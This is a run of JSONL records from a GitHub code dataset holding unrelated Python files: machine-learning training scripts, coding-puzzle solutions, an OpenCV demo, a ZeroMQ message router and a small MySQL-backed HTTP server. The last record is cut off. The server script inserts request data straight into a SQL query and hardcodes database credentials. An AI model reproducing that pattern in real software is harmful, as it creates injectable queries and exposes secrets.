translate(encoder, decoder, decoder_init_state, fr_ens, ctx, max_seq_len):\n for fr_en in fr_ens:\n print('[input] ', fr_en[0])\n input_tokens = fr_en[0].split(' ') + [EOS]\n # 添加 PAD 符号使每个序列等长(长度为 max_seq_len)。\n while len(input_tokens) < max_seq_len:\n input_tokens.append(PAD)\n inputs = nd.array(input_vocab.to_indices(input_tokens), ctx=ctx)\n encoder_state = encoder.begin_state(func=nd.zeros, batch_size=1,\n ctx=ctx)\n encoder_outputs, encoder_state = encoder(inputs.expand_dims(0),\n encoder_state)\n encoder_outputs = encoder_outputs.flatten()\n # 解码器的第一个输入为 BOS 符号。\n decoder_input = nd.array([output_vocab.token_to_idx[BOS]], ctx=ctx)\n decoder_state = decoder_init_state(encoder_state[0])\n #print(encoder_state[0])\n output_tokens = []\n\n for _ in range(max_test_output_len):\n decoder_output, decoder_state = decoder(\n decoder_input, decoder_state, encoder_outputs)\n pred_i = int(decoder_output.argmax(axis=1).asnumpy()[0])\n # 当任一时间步搜索出 EOS 符号时,输出序列即完成。\n if pred_i == output_vocab.token_to_idx[EOS]:\n break\n else:\n output_tokens.append(output_vocab.idx_to_token[pred_i])\n decoder_input = nd.array([pred_i], ctx=ctx)\n print('[output]', ' '.join(output_tokens))\n print('[expect]', fr_en[1], '\\n')\n\n\nloss = gloss.SoftmaxCrossEntropyLoss()\neos_id = output_vocab.token_to_idx[EOS]\n\ndef train(encoder, decoder, decoder_init_state, max_seq_len, ctx,\n eval_fr_ens):\n encoder.initialize(init.Xavier(), ctx=ctx)\n decoder.initialize(init.Xavier(), ctx=ctx)\n decoder_init_state.initialize(init.Xavier(), ctx=ctx)\n encoder_optimizer = gluon.Trainer(encoder.collect_params(), 'adam',\n {'learning_rate': lr})\n decoder_optimizer = gluon.Trainer(decoder.collect_params(), 'adam',\n {'learning_rate': lr})\n decoder_init_state_optimizer = gluon.Trainer(\n decoder_init_state.collect_params(), 'adam', {'learning_rate': lr})\n\n data_iter = gdata.DataLoader(dataset, batch_size, shuffle=True)\n l_sum = 0\n for epoch in range(1, num_epochs + 1):\n for x, y in data_iter:\n cur_batch_size = x.shape[0]\n with autograd.record():\n l = nd.array([0], ctx=ctx)\n valid_length = nd.array([0], ctx=ctx)\n encoder_state = encoder.begin_state(\n func=nd.zeros, batch_size=cur_batch_size, ctx=ctx)\n # encoder_outputs 包含了编码器在每个时间步的隐藏状态。\n encoder_outputs, encoder_state = encoder(x, encoder_state)\n encoder_outputs = encoder_outputs.flatten()\n # 解码器的第一个输入为 BOS 符号。\n decoder_input = nd.array(\n [output_vocab.token_to_idx[BOS]] * cur_batch_size,\n ctx=ctx)\n mask = nd.ones(shape=(cur_batch_size,), ctx=ctx)\n decoder_state = decoder_init_state(encoder_state[0])\n #print(encoder_state[0])\n for i in range(max_seq_len):\n decoder_output, decoder_state = decoder(\n decoder_input, decoder_state, encoder_outputs)\n # 解码器使用当前时间步的预测词作为下一时间步的输入。\n decoder_input = decoder_output.argmax(axis=1)\n valid_length = valid_length + mask.sum()\n l = l + (mask * loss(decoder_output, y[:, i])).sum()\n mask = mask * (y[:, i] != eos_id)\n l = l / valid_length\n l.backward()\n encoder_optimizer.step(1)\n decoder_optimizer.step(1)\n decoder_init_state_optimizer.step(1)\n l_sum += l.asscalar() / max_seq_len\n\n if epoch % eval_interval == 0 or epoch == 1:\n if epoch == 1:\n print('epoch %d, loss %f, ' % (epoch, l_sum / len(data_iter)))\n else:\n print('epoch %d, loss %f, '\n % (epoch, l_sum / eval_interval / len(data_iter)))\n if epoch != 1:\n l_sum = 0\n translate(encoder, decoder, decoder_init_state, eval_fr_ens, ctx,\n max_seq_len)\n\nencoder = Encoder(len(input_vocab), encoder_embed_size, encoder_num_hiddens,\n encoder_num_layers, encoder_drop_prob)\ndecoder = Decoder(decoder_num_hiddens, len(output_vocab),\n decoder_num_layers, max_seq_len, decoder_drop_prob,\n alignment_size, encoder_num_hiddens)\ndecoder_init_state = DecoderInitState(encoder_num_hiddens,\n decoder_num_hiddens)\n\n\n\neval_fr_ens =[['were was told was understood decided make got', ' Dan\\'s parents were overweight. Dan was overweight as well. The doctors told his parents it was unhealthy. His parents understood and decided to make a change. They got themselves and Dan on a diet.'],\n ['had learned ride did have would sneak got crashed got', 'Carrie had just learned how to ride a bike. She didn\\'t have a bike of her own. Carrie would sneak rides on her sister\\'s bike. She got nervous on a hill and crashed into a wall. The bike frame bent and Carrie got a deep gash on her leg. '],\n ['enjoyed decided go walking happened decided propose was upset did propose',' Morgan enjoyed long walks on the beach. She and her boyfriend decided to go for a long walk. After walking for over a mile, something happened. Morgan decided to propose to her boyfriend. Her boyfriend was upset he didn\\'t propose to her first.'],\n ['was working barged began yelling was taking did know react intervened calmed','Jane was working at a diner. Suddenly, a customer barged up to the counter. He began yelling about how long his food was taking. Jane didn\\'t know how to react. Luckily, her coworker intervened and calmed the man down.'],\n ['was talking continued complain flirting decided agree says listened got got asked can hang','I was talking to my crush today. She continued to complain about guys flirting with her. I decided to agree with what she says and listened to her patiently. After I got home, I got a text from her. She asked if we can hang out tomorrow.']]\n \n#eval_fr_ens =[['elle est japonaise .', 'she is japanese .'],\n# ['ils regardent .', 'they are watching .']]\n\ntrain(encoder, decoder, decoder_init_state, max_seq_len, ctx, eval_fr_ens)","repo_name":"AbnerCode/aws_Gluon_Story-Generation","sub_path":"CODE/8.6/Code/new_story_generation.py","file_name":"new_story_generation.py","file_ext":"py","file_size_in_byte":13590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"18721301612","text":"def solution(survey, choices):\n answer = ''\n dic = { 'R':0, 'T':0, 'C':0, 'F':0, 'J':0, 'M':0, 'A':0, 'N':0 }\n for i,j in zip(survey, choices):\n if j < 4 :\n dic[i[0]] += 4 - (j%4)\n elif j > 4 :\n dic[i[1]] += j - 4 \n\n RCJA = ['R','C','J','A']\n TFMN = ['T','F','M','N']\n\n for x,y in zip(RCJA, TFMN):\n if dic[x] < dic[y] :\n answer += y \n else:\n answer += x \n \n return answer\n","repo_name":"JaeBumPark/code-test","sub_path":"프로그래머스/kmbti.py","file_name":"kmbti.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"72729454942","text":"#1.9\n#import modules\nimport argparse\nimport cv2\nimport numpy as np\n\n#set up argument parser\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", required = True,\n help = \"Path to the image file\")\nargs = vars(ap.parse_args())\n\n# Load the image and show it\nimage = cv2.imread(args[\"image\"])\ncv2.imshow(\"orig\", image)\n\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n#apply gaussian blur with a 7x7 kernel\nblurred = cv2.GaussianBlur(gray, (7, 7), 0)\n\n#basic thresholding using inversing\n#first param is the image we want to threshold\n#second param - is threshold check\n#if pixel is > threshold we set to black, otherwise we set to white\n#third param is output value of thresholding\n#any pixel greater than threshold then we set to the output value\n(T, thresh_inv) = cv2.threshold(blurred, 95, 255, cv2.THRESH_BINARY_INV)\ncv2.imshow(\"thresh binary inv\", thresh_inv)\n\n#normal thresholding\n(T, thresh) = cv2.threshold(blurred, 200, 255, cv2.THRESH_BINARY)\ncv2.imshow(\"thresh binary\", thresh)\n\n#visualize only the masked regions in the image\ncv2.imshow(\"output\", cv2.bitwise_and(image, image, mask=thresh_inv))\ncv2.waitKey(0)\n","repo_name":"dustin-thewind/computer-vision","sub_path":"simple_thresholding.py","file_name":"simple_thresholding.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"41158793311","text":"#Head Material\n#leftPorts=0\n#rightPorts=0\n#done\n\n\n#Block Description\n'''\nAuthor: Kyle Norland\nDate: 10/5/20\nDescription: Boundary manager that rejects messages from internal ids\n'''\n#---------------------------------\n#-------------Imports---------\n#---------------------------------\nimport zmq\nimport json\nimport time\nimport sys\nfrom collections import deque\n\n#Defaults:\nproxyInputPort = 8000\nproxyOutputPort = 9000\nsubTopics = ['cats']\npubTopics = ['bats']\ndata = \"value\"\nblockName = \"mid block--\"\n\nwith open(\"blockLogs/boundLog.txt\", \"w\") as logfile:\n logfile.write(str(time.localtime()))\n #------------------\n #--Pull arguments--\n #------------------\n numArgs = len(sys.argv)\n logfile.write(\"There are \" + str(numArgs) + \" arguments\" + \"\\n\")\n #print(\"There are \" + str(numArgs) + \" arguments\")\n\n if numArgs >= 3:\n proxyInputPort = int(sys.argv[1])\n proxyOutputPort = int(sys.argv[2])\n stringArchitecture = sys.argv[3]\n try:\n jsonArch = json.loads(stringArchitecture)\n subTopics = jsonArch['subTopics']\n pubTopics = jsonArch['pubTopics']\n blockName = jsonArch['blockName']\n participatingIps = jsonArch['participatingIps']\n internalIds = jsonArch['internalIds']\n externalSubs = jsonArch['externalSubs']\n computerIp = jsonArch['computerIp']\n #print(\"boundManager participating ips are: \" + str(participatingIps))\n #print(\"boundManager internal ids are: \" + str(internalIds))\n #print(\"computer ip is: \" + str(computerIp))\n except:\n logfile.write(\"Something in the json loading process broke\"+ \"\\n\")\n print(\"Something in the json loading process broke\")\n\n #------------------------------------------\n #-------Connect to the sockets (modified)--\n #------------------------------------------\n #polls: all local messages, external boundManagers (not self)\n #outputs to self, internal input.\n subSocketList = [] #All except for localProxySocket\n pubSocketList = []\n\n #ZMQ Context\n context = zmq.Context()\n\n #Set up poller (Some code from: https://learning-0mq-with-pyzmq.readthedocs.io/en/latest/pyzmq/multisocket/zmqpoller.html)\n poller = zmq.Poller()\n\n #Local Proxy\n localProxySocket = context.socket(zmq.SUB)\n localProxySocket.connect(\"tcp://127.0.0.1:\" + str(proxyOutputPort))\n localProxySocket.setsockopt_string(zmq.SUBSCRIBE, \"\")\n poller.register(localProxySocket, zmq.POLLIN)\n\n #Register external boundary managers\n for extBoundIp in participatingIps:\n if extBoundIp != computerIp: #Don't select self\n subSocket = context.socket(zmq.SUB)\n socketAddress = \"tcp://\" + str(extBoundIp) + \":\" + \"9846\"\n subSocket.connect(socketAddress)\n subSocket.setsockopt_string(zmq.SUBSCRIBE, \"\")\n subSocketList.append(subSocket)\n poller.register(subSocket, zmq.POLLIN)\n\n #Register publish sockets\n #Internal to the loopback ip on the proxy input port.\n internalPubSocket = context.socket(zmq.PUB)\n internalPubSocket.connect(\"tcp://127.0.0.1:\" + str(proxyInputPort))\n pubSocketList.append(internalPubSocket)\n\n #External to port 9846 on the local ip\n externalPubSocket = context.socket(zmq.PUB)\n externalPubSocket.bind(\"tcp://0.0.0.0:\" + \"9846\") #Bind since it's not connecting to proxy\n pubSocketList.append(externalPubSocket)\n\n #-------------------------------------------------------------\n #----------Run Loop (polls, checks and forwards)------------\n #-------------------------------------------------------------\n #Basic run pattern: Poll, (log), check against internal ids, publish\n print(\"starting loop\")\n while True:\n socks = dict(poller.poll(500))\n for socket in socks:\n topic = socket.recv_string()\n data = socket.recv_json()\n\n #Check if message is from internal, if it is, send out only local ids.\n if socket == localProxySocket:\n print(\"From local proxy socket: \" + str(topic))\n if topic in internalIds:\n externalPubSocket.send_string(topic, zmq.SNDMORE)\n externalPubSocket.send_json(data)\n\n #If message from external, don't allow local ids and check for known subscriptions\n if socket != localProxySocket:\n #print(\"Not from local proxy socket\")\n if (topic not in internalIds) and (topic in externalSubs):\n #Forward to internal\n internalPubSocket.send_string(topic, zmq.SNDMORE)\n internalPubSocket.send_json(data)\n","repo_name":"kylenorland/casa","sub_path":"CASArchitect/blockLibrary/boundManager.py","file_name":"boundManager.py","file_ext":"py","file_size_in_byte":4723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"18268491319","text":"import http.server\nfrom io import BytesIO\nimport mysql.connector\n\n\nclass HttpProcessor(http.server.BaseHTTPRequestHandler):\n def do_GET(self):\n self.send_response(200)\n self.send_header('content-type', 'text/html')\n self.end_headers()\n self.wfile.write(page)\n\n def do_POST(self):\n content_length = int(self.headers['Content-Length'])\n body = self.rfile.read(content_length)\n self.send_response(200)\n self.end_headers()\n date, currency = kurs_from_db(body.decode('utf-8'))\n response = BytesIO()\n response.write(b'USD on ' + date.encode() + b' = ' + str(currency[0]).encode() + b'\\n')\n response.write(b'EUR on ' + date.encode() + b' = ' + str(currency[1]).encode() + b'\\n')\n self.wfile.write(response.getvalue())\n\n\ndef kurs_from_db(body):\n if 'calendar' in body:\n date = body.replace('calendar=', '').replace('-', '.')\n else:\n return\n conn = mysql.connector.connect(user=\"admin\", password=\"qwerty123qwerty123\", host=\"37.139.42.19\", port=3306, database=\"MySQL-8037\")\n sql = conn.cursor()\n db_response = sql.execute(\n f\"select USD, EUR from Currency where DATE = to_date('{date}', 'YYYY.MM.DD')\"\n ).fetchone()\n return date, db_response\n\n\npage = open(\"index.html\", \"rb\").read()\nserver = ('localhost', 80)\nHTTPD = http.server.HTTPServer(server, HttpProcessor)\nprint(f'server START on {server}')\nHTTPD.serve_forever()","repo_name":"ddlisicyn/Simple-HTTP-and-HTTPS-Servers","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"20823418350","text":"from functools import reduce\nclass Solution(object):\n def letterCombinations(self, digits):\n if '' == digits:\n return []\n kvmaps = {\n '2' : 'abc',\n '3' : 'def',\n '4' : 'ghi',\n '5' : 'jkl',\n '6' : 'mno',\n '7' : 'pqrs',\n '8' : 'tuv',\n '9' : 'wxyz'\n }\n return reduce(lambda acc, digit: [x + y for x in acc for y in kvmaps[digit]], digits, [''])\n\n\n '''\n 递归做法:\n mapping = {'2': 'abc', '3': 'def', '4': 'ghi', '5': 'jkl', \n '6': 'mno', '7': 'pqrs', '8': 'tuv', '9': 'wxyz'}\n if len(digits) == 0:\n return []\n if len(digits) == 1:\n return list(mapping[digits[0]])\n prev = self.letterCombinations(digits[:-1])\n additional = mapping[digits[-1]]\n return [s + c for s in prev for c in additional]\n \n '''","repo_name":"Dolantinlist/DolantinLeetcode","sub_path":"1-50/17_letter_combination.py","file_name":"17_letter_combination.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7494906817","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 3\n# of the License, or (at your option) any later version.\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n\n\"\"\"\n HerbASAP - Herbarium Application for Specimen Auto-Processing\n performs post processing steps on raw format images of natural history\n specimens. Specifically designed for Herbarium sheet images.\n\"\"\"\n# imports here\nimport string\nfrom os import path\nimport time\n#import piexif\n\nfrom watchdog.events import PatternMatchingEventHandler\nfrom watchdog.observers import Observer\nfrom PyQt5 import QtCore\nimport cv2\n\n\nclass New_Image_Emitter(QtCore.QObject):\n new_image_signal = QtCore.pyqtSignal(object)\n\n\nclass Event_Handler(PatternMatchingEventHandler):\n \"\"\"\n Watchdog based Class to handle when new files are detected in the monitored\n folder.\n \"\"\"\n def __init__(self, parent, watch_dir, emitter=None, *args, **kwargs):\n super(Event_Handler, self).__init__(*args, **kwargs)\n PatternMatchingEventHandler.__init__(self, *args, **kwargs)\n self._emitter = emitter\n self.parent = parent\n self.watch_dir = watch_dir\n self.last_item = None\n self._emitEvents = ['created', 'renamed', 'modified', 'moved']\n self._removeEvents = ['deleted', 'moved']\n\n def on_any_event(self, event):\n \"\"\"\n attempts to handle the event based on the event type and destination\n \"\"\"\n event_type = event.event_type\n img_path = event.src_path\n img_filename, img_ext = path.splitext(img_path)\n # be sure the destination path is the focus\n if event_type in ['renamed', 'moved']:\n img_path = event.dest_path\n # if it is leaving the self.watch_dir, set self.last_item = None\n elif img_ext.lower() == '.tmp':\n return\n if (path.dirname(img_path) != self.watch_dir) or event.event_type in self._removeEvents:\n # if a file is moved out of self.watch_dir:\n if img_path == self.last_item:\n self.last_item = None\n # if the event is an emit event and has not been seen emit it.\n if (event_type in self._emitEvents) and (img_path != self.last_item):\n # first be sure it has finished arriving to the destination folder\n historicalSize = -1\n #waits = 1\n while (historicalSize != path.getsize(img_path)):\n historicalSize = path.getsize(img_path)\n # This solution could be improved\n time.sleep(.1)\n #print(f'you had to wait {waits} times')\n #waits += 1\n\n self._emitter.new_image_signal.emit(img_path)\n elif (event_type in self._removeEvents) and (img_path != self.last_item):\n # handle when the last image was removed for recapture\n self.last_item = ''\n # remember this was the last object seen.\n self.last_item = img_path\n return\n\n\nclass Folder_Watcher:\n def __init__(self, input_folder_path=None, raw_image_patterns=None):\n self.watch_dir = input_folder_path\n self.emitter = New_Image_Emitter()\n self.event_handler = Event_Handler(\n parent=self,\n watch_dir=self.watch_dir,\n emitter=self.emitter,\n patterns=raw_image_patterns,\n ignore_directories=True)\n self.is_monitoring = False\n\n def run(self):\n if self.is_monitoring:\n pass\n else:\n self.observer = Observer(timeout=0.2)\n self.is_monitoring = True\n # store the start time timer for use with get_runtime\n self.start_time = time.time()\n self.img_count = 0\n self.observer.schedule(self.event_handler, self.watch_dir)\n self.observer.start()\n\n def get_runtime(self):\n \"\"\"\n If self.is_monitoring, returns the runtime in decimal minutes,\n otherwise returns 0.00\n \"\"\"\n if self.is_monitoring:\n result = round((time.time() - self.start_time) / 60, 2)\n else:\n result = 0.00\n return result\n\n def stop(self):\n while (self.observer.event_queue.unfinished_tasks != 0):\n time.sleep(1)\n self.observer.stop()\n self.observer.join(timeout=.1)\n self.is_monitoring = False\n","repo_name":"CapPow/HerbASAP","sub_path":"libs/folderMonitor.py","file_name":"folderMonitor.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"7"} +{"seq_id":"20295882360","text":"from meshed import FuncNode, DAG\nimport streamlit as st\nfrom plunk.sb.front_experiments.streamlitfront_dataprep.data_prep2 import (\n data_from_wav_folder,\n data_from_csv,\n store_to_key_fvs,\n key_fvs_to_tag_fvs,\n mk_Xy,\n)\nfrom odat.mdat.vacuum import (\n DFLT_ANNOTS_COLS,\n DFLT_CHUNKER,\n DFLT_FEATURIZER,\n)\nfrom streamlitfront.examples.util import Graph\nfrom streamlitfront.elements import TextInput, SelectBox, FloatSliderInput\n\nfrom front.spec_maker_base import APP_KEY, RENDERING_KEY, ELEMENT_KEY, NAME_KEY\nfrom streamlitfront.base import mk_app\n\nDFLT_CHUNKER_MAKER = lambda: DFLT_CHUNKER\nDFLT_FEATURIZER_MAKER = lambda: DFLT_FEATURIZER\n\nFixedSizeChunker = DFLT_CHUNKER\nFeaturizer = DFLT_FEATURIZER\n\nif 'mall' not in st.session_state:\n st.session_state['mall'] = dict(\n # train_audio={},\n # tag={},\n # unused_store={\"to\": \"illustrate\"},\n global_input={}\n )\n\nmall = st.session_state['mall']\nmall['global_input'] = ['a name', 3]\n\n\ndef funcnode_maker(name):\n kwargs = metadata[name]\n return FuncNode(**kwargs)\n\n\ndef dag_maker(funcnames_list):\n func_nodes = list(map(funcnode_maker, funcnames_list))\n return DAG(func_nodes)\n\n\ndef f(msg):\n return msg + 'bob'\n\n\ndef g(x):\n return int(x) + 1\n\n\ndef mul(msg_out, multiplier):\n return msg_out * multiplier\n\n\nmetadata = {\n 'f': {'func': f, 'out': 'msg_out'},\n 'g': {'func': g, 'out': 'multiplier'},\n 'mul': {'func': mul, 'out': 'result'},\n}\n\n# Make a dag from only typing info\n# my_chunker: Chunker -->\nfuncnames_list = ['f', 'g', 'mul']\n\n\ndef delegate_input(input_nodes):\n dflt_val = {\n ELEMENT_KEY: SelectBox,\n 'options': mall['global_input'],\n }\n\n return {k: dflt_val for k in input_nodes}\n\n\nif __name__ == '__main__':\n\n dag = dag_maker(funcnames_list)\n var_nodes = dag.var_nodes\n print(var_nodes)\n nodes_list = ['x', 'msg']\n print(dag.synopsis_string())\n\n config_ = {\n APP_KEY: {'title': 'Simple Load and Display'},\n RENDERING_KEY: {\n DAG: {\n 'graph': {ELEMENT_KEY: Graph, NAME_KEY: 'Flow',},\n 'execution': {'inputs': delegate_input(nodes_list),},\n },\n },\n }\n\n app = mk_app([dag], config=config_)\n app()\n","repo_name":"otosense/plunk","sub_path":"plunk/sb/front_experiments/streamlitfront_dataprep/data_prep4.py","file_name":"data_prep4.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"40797138945","text":"import argparse, pickle, os\nimport torch.nn as nn\n#from torch import tensor, save, add, rand, floor, zeros, long\nimport torch\nimport torch.optim as optim\nimport numpy as np\n\nfrom .main import MainLinear, MainDeep\n\n\ndef train_linear(model):\n training_size = 100\n inputs = torch.rand(training_size, 2) # trains model with size of training_size with dimension 2\n \n labels = torch.zeros(training_size, 2, dtype=torch.float) # create output of same size\n\n labels[:,1] = torch.floor(inputs[:,0]**2 + inputs[:,1]**2) # generates output of tensor \n labels[:,0] = torch.add(-labels[:,1], 1) \n\n# labels[:,0] = floor(inputs[:,0]**2 + inputs[:,1]**2) # generates output of tensor \n# labels[:,1] = -labels[:,0] + 1\n\n model = MainLinear()\n criterion = nn.BCEWithLogitsLoss()\n\n optimizer = optim.SGD(model.parameters(), lr=0.01, momentum=0.9)\n\n running_loss = 0.0\n\n epochs = 10\n for ep in range(epochs):\n for i in range(0, 100):\n model.train()\n optimizer.zero_grad()\n# print(\"session 1\")\n# print(inputs, labels)\n outputs, _ = model(inputs)\n loss = criterion(outputs, labels)\n# print(loss)\n\n loss.backward()\n optimizer.step()\n\n running_loss += loss.item()\n print('Epoch %d, loss:%.4f' % (ep+1, running_loss/100))\n running_loss = 0\n print('Model State --->')\n print(model.state_dict())\n\n # Save the trained model\n dirname = os.path.dirname(os.path.abspath(__file__)) # Do NOT modify this line\n torch.save(model.state_dict(), os.path.join(dirname, 'linear')) # Do NOT modify this line\n\ndef train_deep(model):\n '''\n Your code here\n '''\n\n # Save the trained model\n dirname = os.path.dirname(os.path.abspath(__file__)) # Do NOT modify this line\n save(model.state_dict(), os.path.join(dirname, 'deep')) # Do NOT modify this line\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('model', choices=['linear', 'deep'])\n args = parser.parse_args()\n\n if args.model == 'linear':\n print ('[I] Start training linear model')\n train_linear(MainLinear())\n elif args.model == 'deep':\n print ('[I] Start training linear model')\n train_deep(MainDeep())\n\n print ('[I] Training finished')\n","repo_name":"SouLeo/CS342_NeuralNets","sub_path":"cs342_hw/homework_02/homework/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"1688313019","text":"#!/usr/bin/env pypy3\n\nimport re\nimport sys\n\nINPUT_RE = re.compile(r'(?P[xy])=(?P\\d+), (?P[xy])=(?P\\d+)..(?P\\d+)')\n\n\ndef load_clay(filename):\n with open(filename) as input_file:\n lines = input_file.read().strip().splitlines()\n for line in lines:\n match = INPUT_RE.match(line)\n if match.group('d1') == 'x' and match.group('d2') == 'y':\n x = int(match.group('v1'))\n for y in range(int(match.group('v2s')), int(match.group('v2e')) + 1):\n yield x, y\n elif match.group('d1') == 'y' and match.group('d2') == 'x':\n y = int(match.group('v1'))\n for x in range(int(match.group('v2s')), int(match.group('v2e')) + 1):\n yield x, y\n else:\n raise ValueError()\n\n\nTEST = set(load_clay('test.txt'))\nBLOCKS = set(load_clay('input.txt'))\n\n\ndef visualise(flowing_water, resting_water, clay, stdout=False):\n min_x = min(x for x, y in flowing_water | resting_water | clay)\n min_y = min(y for x, y in flowing_water | resting_water | clay)\n max_x = max(x for x, y in flowing_water | resting_water | clay)\n max_y = max(y for x, y in flowing_water | resting_water | clay)\n if stdout:\n output = sys.stdout\n output.write('\\n\\n~~~~~~~~~~~~~~~\\n\\n')\n else:\n output = open('debug.txt', 'w')\n for y in range(min_y, max_y + 1):\n for x in range(min_x, max_x + 1):\n if (x, y) in clay:\n output.write('█')\n elif (x, y) in resting_water:\n output.write('W')\n elif (x, y) in flowing_water:\n output.write('~')\n else:\n output.write(' ')\n output.write('\\n')\n if not stdout:\n output.close()\n\n\ndef is_contained(x, y, min_x, max_x, clay, water):\n for left_x in range(x, min_x - 1, step=-1):\n if (left_x, y + 1) not in clay and (left_x, y + 1) not in water:\n return False\n if (left_x, y) in clay:\n for right_x in range(x, max_x + 1):\n if (right_x, y + 1) not in clay and (right_x, y + 1) not in water:\n return False\n if (right_x, y) in clay:\n return True\n\n\ndef simulate(clay):\n flowing_water = {(500, 0)}\n resting_water = set()\n min_x = min(x for x, y in clay)\n max_x = max(x for x, y in clay)\n min_y = min(y for x, y in clay)\n max_y = max(y for x, y in clay)\n last_size = (0, 0)\n while last_size != (len(flowing_water), len(resting_water)):\n last_size = (len(flowing_water), len(resting_water))\n for x, y in sorted(flowing_water, key=lambda pos: pos[1]):\n if (x, y + 1) not in clay and (x, y + 1) not in resting_water:\n if y <= max_y:\n flowing_water.add((x, y + 1))\n else:\n if is_contained(x, y, min_x, max_x, clay, resting_water):\n flowing_water.remove((x, y))\n resting_water.add((x, y))\n if (x - 1, y) not in clay and (x - 1, y) not in resting_water:\n flowing_water.add((x - 1, y))\n if (x + 1, y) not in clay and (x + 1, y) not in resting_water:\n flowing_water.add((x + 1, y))\n return len(list(filter(lambda pos: min_y <= pos[1] <= max_y, flowing_water | resting_water))), len(resting_water)\n\n\n# assert(simulate(TEST) == (57, 29))\npart_one, part_two = simulate(BLOCKS)\nprint(\"Part One: {}\".format(part_one))\nprint(\"Part Two: {}\".format(part_two))\n","repo_name":"cnorthwood/adventofcode","sub_path":"2018/17/challenge.py","file_name":"challenge.py","file_ext":"py","file_size_in_byte":3546,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"23155110346","text":"from loguru import logger\nfrom pydantic import Field\nfrom typing_extensions import override\n\nfrom horde_sdk.ai_horde_api.apimodels.alchemy._submit import AlchemyJobSubmitRequest\nfrom horde_sdk.ai_horde_api.apimodels.base import (\n BaseAIHordeRequest,\n JobRequestMixin,\n)\nfrom horde_sdk.ai_horde_api.consts import KNOWN_ALCHEMY_TYPES\nfrom horde_sdk.ai_horde_api.endpoints import AI_HORDE_API_ENDPOINT_SUBPATH\nfrom horde_sdk.consts import HTTPMethod\nfrom horde_sdk.generic_api.apimodels import (\n APIKeyAllowedInRequestMixin,\n HordeAPIObject,\n HordeResponseBaseModel,\n ResponseRequiringFollowUpMixin,\n)\n\n\n# FIXME\nclass AlchemyFormPayloadStable(HordeAPIObject):\n \"\"\"Currently unsupported.\n\n v2 API Model: `ModelInterrogationFormPayloadStable`\n \"\"\"\n\n @override\n @classmethod\n def get_api_model_name(cls) -> str | None:\n return \"ModelInterrogationFormPayloadStable\"\n\n additionalProp1: str = Field(validation_alias=\"additionalProp1\", description=\"Currently unsupported\")\n additionalProp2: str = Field(validation_alias=\"additionalProp2\", description=\"Currently unsupported\")\n additionalProp3: str = Field(validation_alias=\"additionalProp3\", description=\"Currently unsupported\")\n\n\nclass AlchemyPopFormPayload(HordeAPIObject, JobRequestMixin):\n \"\"\"v2 API Model: `InterrogationPopFormPayload`.\"\"\"\n\n @override\n @classmethod\n def get_api_model_name(cls) -> str | None:\n return \"InterrogationPopFormPayload\"\n\n form: KNOWN_ALCHEMY_TYPES = Field(\n None,\n description=\"The name of this interrogation form\",\n examples=[\"caption\"],\n )\n payload: AlchemyFormPayloadStable | None = None\n r2_upload: str | None = Field(None, description=\"The URL in which the post-processed image can be uploaded.\")\n source_image: str | None = Field(None, description=\"The URL From which the source image can be downloaded.\")\n\n\nclass NoValidAlchemyFound(HordeAPIObject):\n \"\"\"v2 API Model: `NoValidInterrogationsFoundStable`.\"\"\"\n\n @override\n @classmethod\n def get_api_model_name(cls) -> str | None:\n return \"NoValidInterrogationsFoundStable\"\n\n bridge_version: int | None = Field(\n None,\n description=(\n \"How many waiting requests were skipped because they require a higher version of the bridge than this\"\n \" worker is running (upgrade if you see this in your skipped list).\"\n ),\n examples=[0],\n ge=0,\n )\n untrusted: int | None = Field(\n None,\n description=(\n \"How many waiting requests were skipped because they demanded a trusted worker which this worker is not.\"\n ),\n ge=0,\n )\n worker_id: int | None = Field(\n None,\n description=\"How many waiting requests were skipped because they demanded a specific worker.\",\n ge=0,\n )\n\n\nclass AlchemyPopResponse(HordeResponseBaseModel, ResponseRequiringFollowUpMixin):\n \"\"\"v2 API Model: `InterrogationPopPayload`.\"\"\"\n\n # and not actually specifying a schema\n forms: list[AlchemyPopFormPayload] | None = None\n skipped: NoValidAlchemyFound | None = None\n\n @override\n @classmethod\n def get_api_model_name(cls) -> str | None:\n return \"InterrogationPopPayload\"\n\n @override\n @classmethod\n def get_follow_up_default_request_type(cls) -> type[AlchemyJobSubmitRequest]:\n return AlchemyJobSubmitRequest\n\n @override\n @classmethod\n def get_follow_up_failure_cleanup_request_type(cls) -> type[AlchemyJobSubmitRequest]:\n return AlchemyJobSubmitRequest\n\n @override\n def get_follow_up_returned_params(self) -> list[dict[str, object]]:\n if not self.forms:\n return []\n all_ids: list[dict[str, object]] = []\n 